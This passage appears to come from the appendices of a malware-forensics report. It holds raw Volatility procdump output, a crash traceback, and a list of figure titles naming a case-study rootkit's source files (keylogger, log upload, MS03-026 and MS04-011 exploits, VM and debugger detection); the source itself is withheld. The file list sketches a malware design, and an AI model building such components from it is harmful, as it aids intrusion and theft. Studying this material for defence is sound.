Memory Not Accessible: Virtual Address: 0x10e0000 File Offset: 0xda000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10e1000 File Offset: 0xdb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10e2000 File Offset: 0xdc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10e3000 File Offset: 0xdd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10e4000 File Offset: 0xde000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10e5000 File Offset: 0xdf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10e6000 File Offset: 0xe0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10e7000 File Offset: 0xe1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10e8000 File Offset: 0xe2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10e9000 File Offset: 0xe3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ea000 File Offset: 0xe4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10eb000 File Offset: 0xe5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ec000 File Offset: 0xe6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ed000 File Offset: 0xe7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ee000 File Offset: 0xe8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10ef000 File Offset: 0xe9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10f0000 File Offset: 0xea000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10f2000 File Offset: 0xeb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10f3000 File Offset: 0xec000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10f4000 File Offset: 0xed000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10f5000 File Offset: 0xee000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x10f6000 File Offset: 0xef000 Size: 0x1000
************************************************************************
Dumping msmsgs.exe, pid: 792 output: executable.792.exe
Memory Not Accessible: Virtual Address: 0x404000 File Offset: 0x4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x405000 File Offset: 0x5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x408000 File Offset: 0x8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x409000 File Offset: 0x9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x40a000 File Offset: 0xa000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x40c000 File Offset: 0xc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x40e000 File Offset: 0xe000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x40f000 File Offset: 0xf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x410000 File Offset: 0x10000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x412000 File Offset: 0x12000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x413000 File Offset: 0x13000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x414000 File Offset: 0x14000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x415000 File Offset: 0x15000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x416000 File Offset: 0x16000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x417000 File Offset: 0x17000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x418000 File Offset: 0x18000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x419000 File Offset: 0x19000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41a000 File Offset: 0x1a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41b000 File Offset: 0x1b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41c000 File Offset: 0x1c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41d000 File Offset: 0x1d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41e000 File Offset: 0x1e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x41f000 File Offset: 0x1f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x420000 File Offset: 0x20000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x421000 File Offset: 0x21000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x422000 File Offset: 0x22000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x423000 File Offset: 0x23000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x424000 File Offset: 0x24000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x428000 File Offset: 0x28000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x429000 File Offset: 0x29000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x42c000 File Offset: 0x2c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x42d000 File Offset: 0x2d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x42e000 File Offset: 0x2e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x430000 File Offset: 0x30000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x432000 File Offset: 0x32000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x433000 File Offset: 0x33000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x434000 File Offset: 0x34000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x435000 File Offset: 0x35000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x436000 File Offset: 0x36000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x437000 File Offset: 0x37000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x438000 File Offset: 0x38000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x439000 File Offset: 0x39000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x43a000 File Offset: 0x3a000 Size: 0x1000
127
Memory Not Accessible: Virtual Address: 0x43b000 File Offset: 0x3b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x43c000 File Offset: 0x3c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x43d000 File Offset: 0x3d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x43e000 File Offset: 0x3e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x444000 File Offset: 0x44000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x445000 File Offset: 0x45000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x446000 File Offset: 0x46000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x447000 File Offset: 0x47000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44a000 File Offset: 0x4a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44b000 File Offset: 0x4b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44c000 File Offset: 0x4c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44d000 File Offset: 0x4d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44e000 File Offset: 0x4e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x44f000 File Offset: 0x4f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x450000 File Offset: 0x50000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x452000 File Offset: 0x51000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x453000 File Offset: 0x52000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x454000 File Offset: 0x53000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x455000 File Offset: 0x54000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x456000 File Offset: 0x55000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x457000 File Offset: 0x56000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x458000 File Offset: 0x57000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x459000 File Offset: 0x58000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x45a000 File Offset: 0x59000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x45b000 File Offset: 0x5a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x45c000 File Offset: 0x5b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x45d000 File Offset: 0x5c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x45e000 File Offset: 0x5d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x45f000 File Offset: 0x5e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x460000 File Offset: 0x5f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x461000 File Offset: 0x60000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x462000 File Offset: 0x61000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x463000 File Offset: 0x62000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x464000 File Offset: 0x63000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x465000 File Offset: 0x64000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x466000 File Offset: 0x65000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x467000 File Offset: 0x66000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x468000 File Offset: 0x67000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x469000 File Offset: 0x68000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x46a000 File Offset: 0x69000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x46b000 File Offset: 0x6a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x46c000 File Offset: 0x6b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x46d000 File Offset: 0x6c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x46e000 File Offset: 0x6d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x46f000 File Offset: 0x6e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x470000 File Offset: 0x6f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x471000 File Offset: 0x70000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x472000 File Offset: 0x71000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x473000 File Offset: 0x72000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x474000 File Offset: 0x73000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x475000 File Offset: 0x74000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x476000 File Offset: 0x75000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x477000 File Offset: 0x76000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x478000 File Offset: 0x77000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x479000 File Offset: 0x78000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x47a000 File Offset: 0x79000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x47b000 File Offset: 0x7a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x47c000 File Offset: 0x7b000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x47d000 File Offset: 0x7c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x47f000 File Offset: 0x7e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x480000 File Offset: 0x7f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x481000 File Offset: 0x80000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x482000 File Offset: 0x81000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x483000 File Offset: 0x82000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x484000 File Offset: 0x83000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x485000 File Offset: 0x84000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x487000 File Offset: 0x86000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x488000 File Offset: 0x87000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x489000 File Offset: 0x88000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x48a000 File Offset: 0x89000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x48c000 File Offset: 0x8b000 Size: 0x1000
128
Memory Not Accessible: Virtual Address: 0x48d000 File Offset: 0x8c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x48e000 File Offset: 0x8d000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x48f000 File Offset: 0x8e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x490000 File Offset: 0x8f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x491000 File Offset: 0x90000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x492000 File Offset: 0x91000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x493000 File Offset: 0x92000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x495000 File Offset: 0x94000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x496000 File Offset: 0x95000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x497000 File Offset: 0x96000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x498000 File Offset: 0x97000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x499000 File Offset: 0x98000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x49a000 File Offset: 0x99000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x49b000 File Offset: 0x9a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x49d000 File Offset: 0x9c000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x49f000 File Offset: 0x9e000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a0000 File Offset: 0x9f000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a1000 File Offset: 0xa0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a2000 File Offset: 0xa1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a3000 File Offset: 0xa2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a4000 File Offset: 0xa3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a5000 File Offset: 0xa4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a6000 File Offset: 0xa5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a7000 File Offset: 0xa6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a8000 File Offset: 0xa7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4a9000 File Offset: 0xa8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4aa000 File Offset: 0xa9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ab000 File Offset: 0xaa000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ac000 File Offset: 0xab000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ad000 File Offset: 0xac000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ae000 File Offset: 0xad000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4af000 File Offset: 0xae000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b0000 File Offset: 0xaf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b1000 File Offset: 0xb0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b2000 File Offset: 0xb1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b3000 File Offset: 0xb2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b4000 File Offset: 0xb3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b5000 File Offset: 0xb4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b6000 File Offset: 0xb5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b7000 File Offset: 0xb6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b8000 File Offset: 0xb7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4b9000 File Offset: 0xb8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ba000 File Offset: 0xb9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4bb000 File Offset: 0xba000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4bc000 File Offset: 0xbb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4bd000 File Offset: 0xbc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4be000 File Offset: 0xbd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4bf000 File Offset: 0xbe000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c0000 File Offset: 0xbf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c1000 File Offset: 0xc0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c2000 File Offset: 0xc1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c3000 File Offset: 0xc2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c4000 File Offset: 0xc3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c5000 File Offset: 0xc4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c6000 File Offset: 0xc5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c7000 File Offset: 0xc6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c8000 File Offset: 0xc7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4c9000 File Offset: 0xc8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ca000 File Offset: 0xc9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4cb000 File Offset: 0xca000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4cc000 File Offset: 0xcb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4cd000 File Offset: 0xcc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ce000 File Offset: 0xcd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4cf000 File Offset: 0xce000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4d0000 File Offset: 0xcf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4d1000 File Offset: 0xd0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4d2000 File Offset: 0xd1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4d3000 File Offset: 0xd2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4d4000 File Offset: 0xd3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4d5000 File Offset: 0xd4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4d6000 File Offset: 0xd5000 Size: 0x1000
129
Memory Not Accessible: Virtual Address: 0x4d7000 File Offset: 0xd6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4d8000 File Offset: 0xd7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4d9000 File Offset: 0xd8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4da000 File Offset: 0xd9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4db000 File Offset: 0xda000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4dc000 File Offset: 0xdb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4dd000 File Offset: 0xdc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4de000 File Offset: 0xdd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4df000 File Offset: 0xde000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e0000 File Offset: 0xdf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e1000 File Offset: 0xe0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e2000 File Offset: 0xe1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e3000 File Offset: 0xe2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e4000 File Offset: 0xe3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e5000 File Offset: 0xe4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e6000 File Offset: 0xe5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e7000 File Offset: 0xe6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e8000 File Offset: 0xe7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4e9000 File Offset: 0xe8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ea000 File Offset: 0xe9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4eb000 File Offset: 0xea000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ec000 File Offset: 0xeb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ed000 File Offset: 0xec000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ee000 File Offset: 0xed000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ef000 File Offset: 0xee000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f0000 File Offset: 0xef000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f1000 File Offset: 0xf0000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f2000 File Offset: 0xf1000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f3000 File Offset: 0xf2000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f4000 File Offset: 0xf3000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f5000 File Offset: 0xf4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f6000 File Offset: 0xf5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f7000 File Offset: 0xf6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f8000 File Offset: 0xf7000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4f9000 File Offset: 0xf8000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4fa000 File Offset: 0xf9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4fb000 File Offset: 0xfa000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4fc000 File Offset: 0xfb000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4fd000 File Offset: 0xfc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4fe000 File Offset: 0xfd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x4ff000 File Offset: 0xfe000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x500000 File Offset: 0xff000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x501000 File Offset: 0x100000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x502000 File Offset: 0x101000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x503000 File Offset: 0x102000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x504000 File Offset: 0x103000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x505000 File Offset: 0x104000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x506000 File Offset: 0x105000 Size: 0x1000
************************************************************************
Dumping wuauclt.exe, pid: 484 output: executable.484.exe
Memory Not Accessible: Virtual Address: 0x1004000 File Offset: 0x4000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1005000 File Offset: 0x5000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1006000 File Offset: 0x6000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1009000 File Offset: 0x9000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100c000 File Offset: 0xc000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100d000 File Offset: 0xd000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100e000 File Offset: 0xe000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x100f000 File Offset: 0xf000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1012000 File Offset: 0x12000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1013000 File Offset: 0x13000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1014000 File Offset: 0x14000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1015000 File Offset: 0x15000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1016000 File Offset: 0x16000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1017000 File Offset: 0x17000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1018000 File Offset: 0x18000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x1019000 File Offset: 0x19000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x101a000 File Offset: 0x1a000 Size: 0x1000
Memory Not Accessible: Virtual Address: 0x101b000 File Offset: 0x1b000 Size: 0x1000
************************************************************************
Traceback (most recent call last):
File "volatility", line 219, in <module>
130
main()
File "volatility", line 212, in main
modules[argv[1]].execute(argv[1], argv[2:])
File "/Users/steve/Downloads/Volatility-1.3_Beta/vmodules.py", line 62, in
execute
self.cmd_execute(module, args)
File "/Users/steve/Downloads/Volatility-1.3_Beta/vmodules.py", line 1915, in
procdump
image_file_name = process_imagename(process_address_space, types, task)
File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/win32/tasks.py", line
131, in process_imagename
['_EPROCESS', 'ImageFileName'], task_vaddr)
File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/object.py", line 147,
in read_null_string
string = read_string(addr_space, types, member_list, vaddr, max_length)
File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/object.py", line 141,
in read_string
val = addr_space.read(vaddr + offset, max_length)
File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/x86.py", line 124, in
read
paddr = self.vtop(vaddr)
File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/x86.py", line 109, in
vtop
if self.entry_present(pgd):
File "/Users/steve/Downloads/Volatility-1.3_Beta/forensics/x86.py", line 72, in
entry_present
if (entry & (0x00000001)) == 0x00000001:
TypeError: unsupported operand type(s) for &: 'NoneType' and 'int'
bash-3.2$ exit
exit
Script done on Sat Feb 5 15:33:52 2011
Figure 49 – Full output of Volatility analysis
131
Appendix C – Case study Rootkit source code please contact the author to request the source code
Figure 50 – main.c
Figure 51 – install_as_persistent.c
Figure 52 – version.c
Figure 53 – systeminfo.c
Figure 54 – create_sock.c
Figure 55 – download.c
Figure 56 – getnick.c
Figure 57 – http_readline.c
Figure 58 – randfilename.c
Figure 59 – getRandomPIN.c
Figure 60 – encoding.c
Figure 61 – debuggerdetect.c
Figure 62 – killprocess.c
Figure 63 – listprocesses.c
Figure 64 – keylogger.c
Figure 65 – keylogcontrol.c
Figure 66 – uploadkeylog.c
132
Figure 67 – update.c
Figure 68 – scanhost.c
Figure 69 – sleep.c
Figure 70 – vmdetect.c
Figure 71 – ms03_026.c
Figure 72 – ms04_011.c
Figure 73 – main.h
Figure 74 – version.h
Figure 75 – textstrings.h
133
Appendix D – Creation of infection ShellCode